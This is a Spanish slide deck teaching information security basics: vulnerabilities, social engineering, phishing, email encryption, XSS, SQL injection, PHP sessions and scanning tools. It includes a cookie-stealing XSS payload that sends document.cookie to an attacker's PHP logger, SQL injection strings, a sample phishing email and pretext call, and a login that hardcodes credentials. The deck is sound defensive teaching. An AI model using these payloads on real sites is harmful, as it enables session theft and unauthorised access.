  • 3. Seguridad de la información p Protección de la información y de los sistemas de información contra n Acceso indebido n Uso, negligente o no n Divulgación n Interrupción n Destrucción no autorizada
  • 4. Seguridad de la información p Conceptos básicos n Confidencialidad p La información solo debe ser legible para personal autorizado p Evita que exista una intercepción de esta y que pueda ser leída por una persona no autorizada
  • 5. Seguridad de la información p Conceptos básicos n Disponibilidad p Garantiza el acceso n Irrefutabilidad p No se puede negar la autoría n Autenticación p Solo individuos autorizados tienen acceso a los recursos
  • 6. Seguridad de la información p Conceptos básicos n Integridad p Garantizar que los datos sean los que se suponen que son y no se hayan alterados in situ o durante una transmisión
  • 7. Seguridad de la información Existe la seguridad absoluta???
  • 8. Seguridad de la información p Todo es vulnerable si se aplica aplica la fuerza justa p Laúnica razón por la cual utilizamos rejas en nuestras casas es porque hace que el ataque sea más lento
  • 9. Seguridad de la información p El coste de la seguridad aumenta exponencialmente a la necesidad de minimizar el riesgo p Un hacker puede gastar una ínfima parte en intentar vulnerar un sistema de lo que cuesta evitar el ataque p Las empresas asumen riesgos a fin de minimizar costes
  • 10. Seguridad de la información p Objetivo: p Obtener un factor coste/riesgo asumible p Una máxima: p El sistema de seguridad no puede ser más valioso que el sistema o los datos que protege p Existen documentos, directrices y recomendaciones para establecer políticas de seguridad adecuadas
  • 11. Seguridad de la información VULNERABILIDAD
  • 12. Seguridad de la información p Vulnerabilidad n Es la posibilidad de que una amenaza se materialice sobre un activo n Las amenazas pueden desencadenar incidentes en: p La organización p Los procedimientos p Equipos p Software p Información
  • 13. Seguridad de la información p Analogía con el mundo real: p En el mundo informático el funcionamiento es muy similar p Existe un agujero de seguridad y mientras éste permanezca abierto estaremos predispuestos a sufrir un ataque.
  • 14. Seguridad de la información p Ciclo de vida de una vulnerabilidad: n Supongamos que se ha descubierto una vulnerabilidad n Es de dominio público y aún no hay disponible ni solución ni parche
  • 15. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 1. Creación: p no intencionada en la creación o actualización de un producto p error en el desarrollo o descuido en la configuración. 2. Descubrimiento y publicación: p Webs que ofrecen información diaria sobre las últimas vulnerabilidades y cuentan con extensas BD: p National Vulnerability Database (EN) § http://nvd.nist.gov/ p SecurityFocus (EN) § http://www.securityfocus.com/vulnerabilities p Secunia (EN) § http://secunia.com/advisories/historic/
  • 16. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 3. Explotación de la vulnerabilidad: p se intenta desarrollar programas que automaticen el proceso. 4. Desarrollo de solución o parche: p se desarrolla una solución efectiva y permanente al agujero de seguridad. Entre las distintas posibilidades: p Publicación por parte del fabricante de un parche o actualización del producto p Métodos de prevención temporales o no oficiales como la publicación de un parche independiente del fabricante, el cierre de puertos, la desactivación de servicios, etc.
  • 17. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 5. Difusión de la actualización: p Finaliza la existencia del defecto de seguridad p Masivamente a través de mecanismos de actualización automática así como de una integración total con el producto afectado Nueva “actualización” posible nueva vulnerabilidad?
  • 18. Seguridad de la información p Qué tipos de vulnerabilidades existen Los ataques se pueden producir en cada eslabón de esta cadena, siempre y cuando exista una vulnerabilidad que pueda aprovecharse
  • 19. Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad Física: el atacante tiene posibilidad de entrada o acceso físico a las instalaciones e incluso a los equipos: p Interrupción del suministro eléctrico. p Apagado manual del equipo. p Vandalismo. p Apertura de la carcasa del equipo y robo del disco duro. p Monitorización del tráfico de red. n Vulnerabilidad Natural: se refiere al grado en que el sistema puede verse afectado por desastres naturales o ambientales que pueden dañar el sistema: p Fuego Rayos Terremotos p Inundaciones Fallos eléctricos Picos de tensión
  • 20. Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad del Hardware y del Software: ciertos tipos de dispositivos requieren la posesión de algún tipo de herramienta o tarjeta para poder acceder a los mismos p Bugs de los sistemas operativos p Bugs en software en general n Vulnerabilidad por emanación: los dispositivos eléctricos y electrónicos emiten radiaciones electromagnéticas
  • 21. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n De configuración: es una vulnerabilidad no del diseño del mismo sino del usuario. p Se considera error cuando la configuración por defecto es insegura p Ej.: aplicación recién instalada con usuario por defecto n Gestión de credenciales: tiene que ver con la gestión de usuarios, contraseñas y los ficheros que los almacenan n Permisos, privilegios y/o control de acceso: ocurre cuando el acceso o asignación de permisos es defectuoso p Se trata del sistema y no del administrador
  • 22. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Validación de entrada p se produce cuando la entrada que procesa un sistema no es comprobada adecuadamente n Salto de directorio p es la falta de seguridad de un servicio de red para desplazarse por el árbol de directorios hasta la raíz del sistema. Podrá desplazarse para ejecutar una utilidad de forma remota n Seguimiento de enlaces p cuando no existe una protección bastante robusta para evitar el acceso a un directorio desde un enlace simbólico o acceso directo n Por puertas trampa/traseras p son entradas ocultas en un programa de software que permite el acceso
  • 23. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Por intrusiones: existen diversos tipos: p Análisis de puertos p Elevación de privilegios: consiste en enviar una solicitud específica. En ciertos casos, esto genera comportamientos atípicos. § desbordamiento de búfer: se desborda cuando de forma incontrolada intenta meter más datos de los que caben. Son defectos de programación y existen lenguajes que lo evitan § agotamiento del búfer: cuando un búfer usado para comunicarse entre 2 dispositivos se alimenta con datos a una velocidad mas baja de la que lee p Ataques malintencionados (virus, gusanos, troyanos).
  • 24. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Secuencia de comandos en sitios cruzados (XSS): abarca cualquier ataque que permite ejecutar código de scripting (Ej.: javascript) en el contexto de otro dominio. p Aplicaciones HTML p Navegadores El problema radica en incorrecta validación de los datos de entrada: hay 2 tipos: p Indirecta: modifica valores que la aplicación web utiliza para pasar variables entre paginas, sin sesiones (URL) p Directa: localiza puntos débiles en la programación de filtros (Formularios)
  • 25. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n SQL Injection: está en el nivel de BD de una aplicación. p Consiste en insertar un trozo de código SQL dentro de otro con el fin de modificar su comportamiento. p Se realiza una consulta con parámetros dados por el usuario y dentro de esos datos estaría el código malicioso n Por denegación de servicio: interrumpir el funcionamiento normal de un servicio. p Las denegaciones de servicio se dividen: § Explotación de las debilidades del protocolo TCP/IP. § Explotación de las vulnerabilidades del software del servidor.
  • 26. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Inyección de código: Existen distintos subtipos: p Inyección directa de código estático § Código en el contenido de las páginas § Permanente § Solución usar listas negras y listas blancas p Evaluación directa de código dinámico § Código en contenido dinámico § No permanente § Necesidad de crear funciones § Solución usar listas negras y listas blancas p Inclusión remota de archivos PHP § Uso de la función include() o require() que permite enlazar archivos en otros servidores § Si en el include/require incorporamos variables o funciones que puedan ser alteradas
  • 27. Seguridad de la información INGENIERÍA SOCIAL
  • 28. Seguridad de la información p La mayor parte de los ataques exitosos son total o parcialmente debidos a Ingeniería Social p Kevin Mitnick “Condor” es considerado el primer hacker que la usó. (Doc: Freedom downtown) n “El factor determinante es interpretar correctamente las políticas de seguridad y hacerlas cumplir” n Los ataques de ingeniería social (teléfono o email), son basados en cuatro principios básicos y comunes a las personas: p Todos queremos ayudar p Somos confiados p No nos gusta decir No p A todos nos gusta que nos alaben
  • 29. Seguridad de la información p Ingeniería social n Consiste en la manipulación de las personas para que voluntariamente realicen actos que normalmente no harían n Se convierte en el método de ataque más sencillo, menos peligroso para el atacante y por desgracia en uno de los más efectivos n Aprovecha el desconocimiento de unas mínimas medidas de seguridad
  • 30. Seguridad de la información p Ingeniería social Ah, también gestiono una red. Nunca pude ¿Cómo configura pensar en sus firewalls? una buena contraseña. ¿Qué utiliza usted?
  • 31. Seguridad de la información p Ingeniería social - Phishing Phisher se Phisher utiliza la prepara para información para atacar suplantar a víctima Phisher envía mail fraudulento a victimas Información Víctima sigue confidencial es indicaciones de enviada al Phisher phisher Víctima compromete información confidencial
  • 32. Seguridad de la información p Ejemplos Ingeniería social n correo electrónico: From: Super-User <root@sistema.com> To: Usuario <user@sistema.com> Subject: Cambio de clave Hola, Para realizar una serie de pruebas orientadas a conseguir un optimo funcionamiento de nuestro sistema, es necesario que cambie su clave mediante la orden 'passwd'. Hasta que reciba un nuevo aviso (aproximadamente en una semana), por favor, asigne a su contraseña el valor 'PEPITO' (en mayúsculas). Rogamos disculpe las molestias. Saludos, Administrador
  • 33. Seguridad de la información p Ejemplos Ingeniería social n Llamada telefónica (el atacante sabe el nombre de cuenta): Administrador: Buenos días, aquí área de sistemas, en qué podemos ayudarle? Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo recordar mi password en la máquina sistema.xx.es. Administrador: Un momento, me puede decir su nombre de usuario? Atacante: Sí, claro, es jlperez. Administrador: Muy bien, la nueva contraseña que acabo de asignarle es *****. Por favor, nada más conectar, no olvide cambiarla. Atacante: Por supuesto. Muchas gracias, ha sido muy amable. Administrador: De nada, un saludo.
  • 34. Seguridad de la información p Ejemplos Ingeniería social n http://www.youtube.com/watch?v=Ao20tAS3x3I n http://www.youtube.com/watch?v=wiRuBZxMLss&feature=re lated (3 videos) n http://www.youtube.com/watch?v=NgHYI4AUUPc n http://www.youtube.com/watch?v=cm89EQCF5e8&feature=re lated
  • 35. Seguridad de la información PHISHING
  • 36. Seguridad de la información p Como funciona 1. Correo electrónico masivo 2. Correo electrónico phishing 3. Sitio Web fraudulento p Afecta principalmente n instituciones financieras n proveedores internet n grandes tiendas
  • 37. Seguridad de la información p Correo n Remitente: Banco Bilbao Vizcaya Argentaria info@bbva.es n Asunto: Aviso Importante n Logotipo oficial n Aviso de Phishing n Derechos reservados n Teléfono de contacto
  • 38. Seguridad de la información Reconocerías una web falsa?
  • 39. Seguridad de la información
  • 40. Seguridad de la información
  • 41. Seguridad de la información
  • 42. Seguridad de la información
  • 43. Seguridad de la información p Correo donde el INE hace un sondeo sobre satisfacción con los bancos 1. Damos la información 2. Nos redirige a la web oficial
  • 44. Seguridad de la información p 40% error incluso entre usuarios “tecnológicamente avanzados” www.bankofthevvest.com www.hatmail.com http://www.faccebook.es/
  • 45. Seguridad de la información p http://www.phishtank.com/ n Facebook: http://faccebook.c.la/ n PayPal: http://www.phishtank.com/phish_detail.php?phish_id=916961 n Bank of America: http://www.phishtank.com/phish_detail.php?phish_id=916955 n Hotmail: http://www.phishtank.com/phish_detail.php?phish_id=916948
  • 46. Seguridad de la información p Otros tipos de phishing n Vía programa malicioso. p Troyano que instala programa espía (en juegos y aplicaciones free) n A través de ataque al navegador con vulnerabilidades p Permite generar interfaces superpuestas sobre webs oficiales p Muy difícil de detectar n Scam: ofertas de trabajo para blanquear dinero n Nuevas variantes: p Vishing: con tecnología VoIp (Identificador de llamada falsificable) p Smishing: usan SMS p Spear phishing: el correo va al jefe (CEO) § Correo personalizado § No usan correo masivo
  • 47. Seguridad de la información p Tendencias n A la profesionalización p Ataques sofisticados y difíciles de detectar p Difícil identificar interfaces falsas p Simulación de URL p Ataques sobre DNS n Siguen funcionando los ataque simples e ingeniería social de nivel bajo n Cada vez más las pequeñas empresas afectadas
  • 48. Seguridad de la información p Prevención n Su usuario, contraseña, pin, firma, etc. son datos de carácter personal y estrictamente confidenciales n Desconfíe de cualquier toma de datos personales realizada a través de Internet fuera de su sitio web seguro. n No dé nunca información personal o financiera en respuesta a un e-mail n No utilice los enlaces incorporados en e-mails o páginas Web de terceros n Cuidado con los adjuntos (exe, doc, xls…) n Educación y mucha cultura de seguridad
  • 49. Seguridad de la información COMO PROTEGERNOS
  • 50. Seguridad de la información p ¿Cómo nos protegemos de la forma más eficiente posible? 1. Determinando que queremos proteger (ej: Hardware, datos, comunicaciones, sistemas, etc.) 2. Estableciendo prioridades de los factores a proteger 3. Creando políticas de seguridad 4. Manteniendo la seguridad en el tiempo
  • 51. Seguridad de la información p Debemos enfocarnos en n reducir el riesgo, no en tratar de eliminar las amenazas, ya que es imposible. p Para eso debemos saber n de qué o quiénes nos protegemos n cómo nos atacan.
  • 52. Seguridad de la información p Pocos ataques tienen éxito sin una preparación previa: Infiltrado de programas, recopilación de información sobre usuarios, claves, etc. p Un sistema de seguridad es tan fuerte como su eslabón más débil p Para poder defender nuestros sistemas, es necesario conocer la forma en que los atacantes actúan y cuáles son sus armas “El único sistema que está seguro es el que se encuentra debidamente apagado y dentro de una caja ignifuga” (Gene Spafford)
  • 53. Seguridad de la información Ataques organizativos Hackers Ataques Datos restringidos automatizados DoS Infracciones accidentales Errores de conexión de la seguridad Denegación de Virus, servicio (DoS) caballos de Troya y gusanos
  • 54. Seguridad de la información p Estrategias de seguridad n Proactivas (proteger y proceder) p Se basan en la prevención de ataques p Reducir al mínimo la cantidad de puntos vulnerables p Desarrollar planes de contingencia n Reactivas (perseguir y procesar) p Posterior al ataque p Evaluar ataque, reparar e implementar plan de contingencia, documentar y aprender
  • 55. Seguridad de la información p Estrategias de seguridad Con respecto a la postura en recursos compartidos n Lo que no se permite está expresamente prohibido p El sistema está perfectamente delimitado n Lo que no se prohíbe está permitido p Menos restrictiva y favorecida por la imposibilidad de políticas de restricción a medida para todos los posibles casos
  • 56. Seguridad de la información p Estrategias de seguridad Datos Encriptación Seguridad de programas y Aplicación servicios Fortalecer el sistema operativo, Host autenticación Marketing, Ventas, Finanzas, Red interna encriptar datos de red Oficina principal, oficina sucursal, Perímetro socio de negocios. Firewall Seguridad física Protecciones, seguros, dispositivos de seguimiento Políticas, procedimientos y Documentos de seguridad, conciencia educación del usuario
  • 57. Seguridad de la información p Debemos formar al usuario: Cultura de seguridad Formatos potencialmente peligrosos No abrir archivos no solicitados No utilizar fuentes no confiables Navegación segura Política de passwords Copias de seguridad
  • 58. Seguridad de la información FIRMA Y CIFRADO DE CORREO
  • 59. Seguridad de la información p Cifrar: Alterar el contenido para que sólo los destinatarios puedan entenderlo p Firmar: permite al destinatario comprobar que el mensaje no fue modificado en el camino y que lo que lee es exactamente lo que se envió p Como lo hacemos p Clave pública: § La conocen sólo los destinatarios § Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros. § Para enviar correos cifrados p Clave privada: § Sólo la conoce el emisor § Permite firmar y descifrar correo § Para enviar correos firmados p no se puede averiguar una a través de la otra.
  • 60. Seguridad de la información p Ejemplo de firma
  • 61. Seguridad de la información p Ejemplo de cifrado
  • 62. Seguridad de la información p Cifrado con PGP (GNU Privacy Guard) n Aplicación de cifrado asimétrico libre n http://www.gnupg.org/ n ftp://ftp.gnupg.org/gcrypt/binary/ (windows) n http://macgpg.sourceforge.net/(mac) p Instalamos PGP p Necesitamos un cliente de correo n Thunderbird n http://es-es.www.mozillamessaging.com/es- ES/thunderbird/ p Necesitamos un software de cifrado y autenticación n Enigmail 1.0.1 n https://addons.mozilla.org/es-ES/thunderbird/addon/71 n Instalamos: ThunderbirdàHerramientasàComplementos n Genera nueva opción de menú OpenPGP
  • 63. Seguridad de la información p Generar las claves n OpenPGP à Administración de claves n En el administrador de claves p Generar à Nuevo par de claves p Generar certificado de revocación p Configuración de las claves n En la configuración de la cuenta : activar soporte OpenPGP p Subir claves públicas a n http://www.rediris.es/cert/servicios/keyserver/
  • 64. Seguridad de la información p Encriptar con GMAIL n Configurar el navegador “Conexión del navegador” para usar siempre https n Instalamos PGP n Usaremos Mozilla Firefox n Instalamos el complemento para Firefox p FireGPG p http://es.getfiregpg.org/s/install p Incompatible con FireFTP p Reiniciar si es necesario n Acceder a Gmail y firmar y cifrar a través de iconos
  • 65. Seguridad de la información AMENAZAS EN LA RED
  • 66. Seguridad de la información p Existen 4 tipos de amenazas en la red: n Interrupción: Hace que el objetivo del ataque se pierda, quede inutilizable o no disponible n Interceptación: Consiste en acceder a un determinado objeto del sistema n Modificación: Además de la interceptación, el objeto del ataque es modificado n Fabricación: Modificación destinada a suplantar el objeto real
  • 67. Seguridad de la información
  • 68. Seguridad de la información p Ataques Internos n Premeditación n Descuido n Ignorancia n Indiferencia de las políticas de seguridad p Ataques externos n Hackers, Crackers, Lammers, Script-Kiddies n Motivaciones: p Ranking, reto personal p Robo de datos p Pruebas (pen test), etc.
  • 69. Seguridad de la información p Origen de las amenazas n Personas: Piratas que buscan nivel de privilegios en un sistema. Además de conocimientos técnicos, usan tácticas como la Ingeniería Social y el Basureo. n Personal de la organización: Cualquier empleado puede ser una amenaza. Pueden causar daños no intencionados, pero cuando lo hacen de forma intencionada son extremadamente dañinos n Ex-empleados: Pueden tener motivos para Atacar n Curiosos: Aunque se trata de ataques no destructivos, el borrado de huellas puede causar daños
  • 70. Seguridad de la información
  • 71. Seguridad de la información p Hackers (expertos) n De sombrero blanco p Ayudan a mejorar los sistemas y tecnologías informáticas p Responsables de los protocolos informáticos y herramientas p Optimizan sistemas, prueban las tecnologías y aprenden con el objetivo de hacerlas mas eficientes y fiables n De sombrero negro (piratas) p Propósito siempre malicioso
  • 72. Seguridad de la información p De sombrero negro (piratas) n Script Kiddies (crashers, lamers, packet monkeys) p Jóvenes usuarios que usan programas encontrados en la red par dañar sistemas p Sin conocimientos y altamente incompetentes p Lamer. Se utiliza con tono despectivo para describir a un hacker que no sigue las reglas de la comunidad, o que intenta pavonearse de sus hazañas y conocimientos. n Phreakers p Usan la red telefónica para hacer llamadas gratis
  • 73. Seguridad de la información p De sombrero negro (piratas) n Caders: atacan sistemas de tarjetas (generalmente bancarias) para entender su funcionamiento y aprovechar sus vulnerabilidades n Crackers: crean software para atacar sistemas informáticos o eliminar la protección anticopia del software con licencia n Hacktivistas: Hackers con motivaciones ideologías
  • 74. Seguridad de la información EN LA WEB
  • 75. Seguridad de la información p Servidores y platatormas web n Ataques internos p Suplantación de identidad p Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) p Robo de información. (Ej: para la competencia) p Virus, Troyanos, Gusanos p Espionaje: Trashing, Shoulder Surfing, Spyware, etc p Keylogging - Keycatching p KeyCatcher
  • 76. Seguridad de la información p Trashing (basureo) n Alfombrilla ratónà
  • 77. Seguridad de la información p Servidores y platatormas web n Ataques externos p Ataques contra servicios WEB § Cross Site Scripting (XSS) § SQL Injection § Exploits: aprovecha una vulnerabilidad de SO, Sw y Hw p Robo de Identidad p Denegación de Servicio (DoS) p SPAM p VIRUS p Phishing: ingeniería social, url mal escritas, webs simuladas p Troyanos: software malicioso bajo una apariencia inofensiva
  • 78. Seguridad de la información CROSS SITE SCRIPTING XSS
  • 79. Seguridad de la información p Servidores y platatormas web n Cross Site Scripting (XSS) p Aprovecha la falta de mecanismos de filtrado en los campos de entrada p Permiten insertar y enviar datos sin validación alguna, aceptando el envió de scripts completos p Pueden generar secuencias de comandos maliciosas que impacten directamente en el sitio o en el equipo de un usuario p Sentencias ocultas en el código: en enlaces, formularios… p Se usa el correo electrónico para enviarlos p Se usan blogs, foros, libros de visitas…
  • 80. Seguridad de la información p Ejemplos Cross Site Scripting (XSS) Supongamos que un sitio web tiene la siguiente forma: http://www.example.com/home.asp?frame=menu.asp En este ejemplo, ¿qué pasaría si se pone como URL del frame un código javascript? javascript:while(1)alert("Este mensaje saldrá indefinidamente");
  • 81. Seguridad de la información p Ejemplos Cross Site Scripting (XSS) Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen de la siguiente manera: http://www.mipagina.com/mifoto.jpg name="foto“ onload="foto.src='http://www.mipagina.com/foto.php? galleta='%20+document.cookie;"> Código de foto.php. <? $migalleta = $_REQUEST[galleta]; $file=fopen("cookies.txt", "a"); fput($file, "$migalletan"); fclose($file); ?> La variable que contiene las cookies galleta del usuario será almacenada en un documento de texto llamado cookies.txt alojado en el servidor del atacante
  • 82. Seguridad de la información p Defensa Cross Site Scripting (XSS) n Url p Evitar llamadas a servidores externos p Evitar parámetros susceptibles (sql, datos privados…) n En formularios: p Limitar la longitud de los campos de entrada MaxLength p Validar los campos (expresiones regulares) n Cookies p Evitar almacenar datos susceptibles § Nombre usuario y contraseña § Tarjetas, cuentas bancarias … p Encriptar todas las cookies de nuestro sitio n Usar SSL (Secure Socket Layer) p No es 100% seguro contra XSS pero ayuda
  • 83. Seguridad de la información SQL INJECTION
  • 84. Seguridad de la información p SQL Injection n Filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. <% usuario=request.form("usuario") pass=request.form("pass") sql="SELECT * FROM usuarios WHERE user='" & usuario & "' and password='" & pass & "'“ %> p El usuario teclea en el formulario usuario:" a' or true ‘" contraseña: " a' or true ‘“ n La cadena resultado sería SELECT * FROM users WHERE user='a' or true and pass='a' or true n Otro ejemplo SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='‘ --
  • 85. Seguridad de la información p SQL Injection n Mas peligroso p Se pueden concatenar sentencias de modificación, insertado y borrado de datos o de tablas n Solución: p No usar usuario root para acceso a las BBDD p Validar el contenido y longitud de los campos p Usar procedimientos almacenados p Evitar es que, al formar la cadena SQL, ésta tenga un "sentido" distinto al esperado = Eliminar comillas $query_result = mysql_query("SELECT * FROM usuarios WHERE nombre = "" . mysql_real_escape_string($nombre_usuario) . """);
  • 86. Seguridad de la información AUTENTIFICACIÓN
  • 87. Seguridad de la información p Autentificación de usuarios en la web n Se emplean sesiones p Son variables globales que nos permiten almacenar datos que necesiten volver a ser usados en otros accesos a la pagina n Pasos p Se crea el formulario de validación (login.php) p Se comprueba la validez del usuario (autenticacion.php) p Se crea la sesión y se da acceso al usuario o se deniega el mismo
  • 88. Seguridad de la información
  • 89. Seguridad de la información p Sesiones (autenticacion.php) <?php //vemos si el usuario y contraseña son válidos if ($_POST["usuario"]=="usuario" && $_POST["contrasena"]=="123"){ //usuario y contraseña válidos session_start(); $_SESSION["autenticado"]= "SI"; // seguridad almacenando sesion_id() $_SESSION[“id_misesion"]= session_id(); header ("Location: aplicacion.php"); }else { //si no existe se va a login.php header("Location: login.php?errorusuario=si"); } ?>
  • 90. Seguridad de la información p Sesiones (seguridad.php) <?php //Inicio la sesión session_start(); //COMPRUEBA QUE EL USUARIO ESTA AUTENTICADO if ($_SESSION["autenticado"] != "SI") { //si no existe, va a la página de autenticacion header("Location: login.php"); //salimos de este script exit(); } ?> n Este código lo incluimos en todas las páginas que requieran validación
  • 91. Seguridad de la información HERRAMIENTAS
  • 92. Seguridad de la información p GFI LANguard : n Escanea redes e informa de: p El nivel de service pack de cada máquina, falta de parches de seguridad, recursos compartidos, puertos abiertos, servicios/ aplicaciones activas en el equipo, datos del registro, passwords débiles, usuarios y grupos, puntos de acceso wireless, dispositivos USB ... p Escanea los resultados y los guarda en documentos HTML, sobre los que se puede consultar la información p Existe una versión gratuita que está disponible para su prueba y uso no comercial durante 30 días http://www.gfi.com/lannetscan
  • 93. Seguridad de la información p eEye retina: n Su función es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada n Esta muy distribuida en el mercado, es sencilla y rápida para el escaneo de vulnerabilidades http://www.eeye.com/Products/Retina.aspx
  • 94. Seguridad de la información p Nikto: n Nikto es un escáner de servidores Web n Open source (GPL) n Busca más de 2000 archivos/CGIs potencialmente peligrosos y problemas en más de 200 servidores. n Tiene la capacidad de no sólo probar vulnerabilidades de CGI sino también que lo hace de forma evasiva, evitando los sistemas de detección de intrusos. n Viene con una documentación muy completa, la cual es recomendable revisar antes de ejecutar el programa. n Es una buena herramienta pero limitada por su uso de Whisker/ libwhisker, debido a la falta de actualizaciones de esta última, por lo que las vulnerabilidades más críticas no son detectadas http://www.cirt.net/nikto2 http://www.madirish.net/?article=216 (cómo instalar en windows)
  • 95. Seguridad de la información p WebScarab n Herramienta que permite analizar aplicaciones que se comunican usando protocolos de comunicación Web como el HTTP y el HTTPS n Almacena los resultados de sus escaneos n Diseñada para permitir a un desarrollador de aplicaciones basadas en HTTP(S) a depurar los errores de implementación y permitir identificar vulnerabilidades en el sistema http://sourceforge.net/projects/owasp/files/WebScarab/
  • 96. Seguridad de la información p Asociación de internautas n Scanner on-line n Realiza un escaneo en remoto de los ‘puertos bien conocidos’ del sistema objeto del estudio n Permite seleccionar los puertos que quieres analizar (hasta un máximo de 5 puertos) n Devuelve como resultado únicamente el estado (abierto, cerrado) en el que se encuentran los puertos seleccionados previamente http://www.internautas.org/w-scanonline.php
  • 97. Seguridad de la información p Dr. Web n Ofrece una herramienta On-line para el análisis en línea de direcciones de Internet en busca de código malicioso que pudiera estar inyectado en las páginas HTML. n En el caso de ser así, nos avisará que el acceso a este sitio podría ser peligroso, ya que podría dañar la configuración del sistema, por lo que sería aconsejable no acceder a dicha URL. http://online.us.drweb.com/?url=1
  • 98. Seguridad de la información p LinkScanner n Analiza URLs en línea o bajo demanda o si prefiere instalarla como herramienta de escritorio n Realiza un análisis de los resultados de búsquedas Web con motores de Google, MSN y Yahoo, para determinar si las páginas mostradas en la búsqueda realizada contienen virus, software espía, explotan alguna vulnerabilidad o se utilizan con otros fines fraudulentos. http://linkscanner.explabs.com/linkscanner/default.aspx
  • 99. Seguridad de la información p Virus Total n Servicio de análisis de archivos sospechosos que permite detectar virus, gusanos, troyanos, y malware en general n Trabaja con los principales motores de antivirus y antimalware: Avast!, Avira, Quick Heal, Clamwin, NOD 32, AVG, Antivir, Ikarus, Panda Platinum, BitDefender, Norton Antivirus n http://www.virustotal.com/
  • 100. Seguridad de la información p Nessus n Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre n Nessus quizás sea el mejor escáner de vulnerabilidades "Open Source" (GPL) que hay disponible en la red n Se actualiza constantemente, con más de 11.000 plugins gratuitos n Nessus 3 ahora es de código cerrado, aunque de coste gratuito a menos que desees los plugins más recientes http://www.nessus.org
  • 101. Seguridad de la información p Nessus n Basado en un modelo cliente/servidor que cuenta con su propio protocolo de comunicación n El servidor explora y prueba ataques contra objetivos establecidos n El cliente realiza las tareas de control, generación de informes y presentación de datos n Consta de 4 ficheros básicos: p Las librerías del programa p Las librerías NASL (Nessus Attack Scripting Language) p El núcleo de la aplicación p Los plugins (gestionan los diferentes tipos de ataques)
  • 102. Seguridad de la información p Nessus
  • 103. Seguridad de la información n Las 75 Herramientas de Seguridad Más Usadas p http://insecure.org/tools/tools-es.html n packet sniffers para Ethernet/LAN : p Wireshark (anteriormente conocido como Ethereal ), p Ettercap, TCPDump, WinDump, WinSniffer, Hunt, Darkstat, traffic-vis, KSniffer) p Redes inalámbricas: Kismet, Network Stumbler , ApSniffer
  • 104. Seguridad de la información NORMAS A SEGUIR
  • 105. Seguridad de la información p Normas de defensa n Respetar las políticas de seguridad n Antivirus + Firewall n Siempre tener nuestros servicios, sistemas operativos y aplicaciones actualizadas a la última versión conocida estable n Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles n Cambiar las claves cada cierto tiempo
  • 106. Seguridad de la información p Normas de defensa n Asignar un responsable de seguridad n Auto-auditar nuestros propios servicios n Autoatacarnos para saber si somos o no vulnerables n Estar siempre alerta. Es muy común: ”a nosotros nadie nos ataca”. n No dejar información sensible en directorios web n No usar las mismas claves para servicios distintos p Muy común: la clave de root sea la misma que la de MySQL y la misma que Apache ...
  • 107. Seguridad de la información p Normas de defensa n Cambiar los puertos por defecto en servicios no públicos n Aplicar técnicas de Hardening n Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras n Habilitar módulos de seguridad (Ej mod_security en Apache)
  • 108. Seguridad de la información p Normas de defensa n Nunca trabajar con ”root” si no es estrictamente necesario n Cerrar puertos y eliminar aplicaciones innecesarias n Proteger las URL (ej: mod_rewrite, o AJAX)
  • 109. Seguridad de la información p Normas de defensa n Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres especiales. n Las claves no deben ser palabras coherentes ni de diccionario n 10 contraseñas mas usadas en la red de 32 millones p 123456-12345-123456789-password-iloveyou-princess- rockyou-1234567-12345678-abc123
  • 110. Seguridad de la información
  • 111. Seguridad de la información p Normas de defensa n Datos: p 16% usa su primer nombre como contraseña. p 14% usa combinaciones excesivamente fáciles de recordar como 1234, 123456, QWERTY p 5% eran nombres de celebridades tipo hanna, matrix o ironman. p 4% corresponden a palabras como password o password1. p 3% llegan a los límites del WTFismo con simples si, no, whatever. n Contraseña segura simple: s+6o1e$7 n Herramientas: p http://keepass.info/: almacena p http://passworg.badhim.com/: genera y valida
  • 112. Seguridad de la información “Seguridad no es un producto, es un proceso.” Bruce Schneier
  • 113. Seguridad de la información http://www.rompecadenas.com.ar/ http://foro.portalhacker.net/ http://www.elhacker.org http://www.kriptopolis.org/
  • 114. Seguridad de la información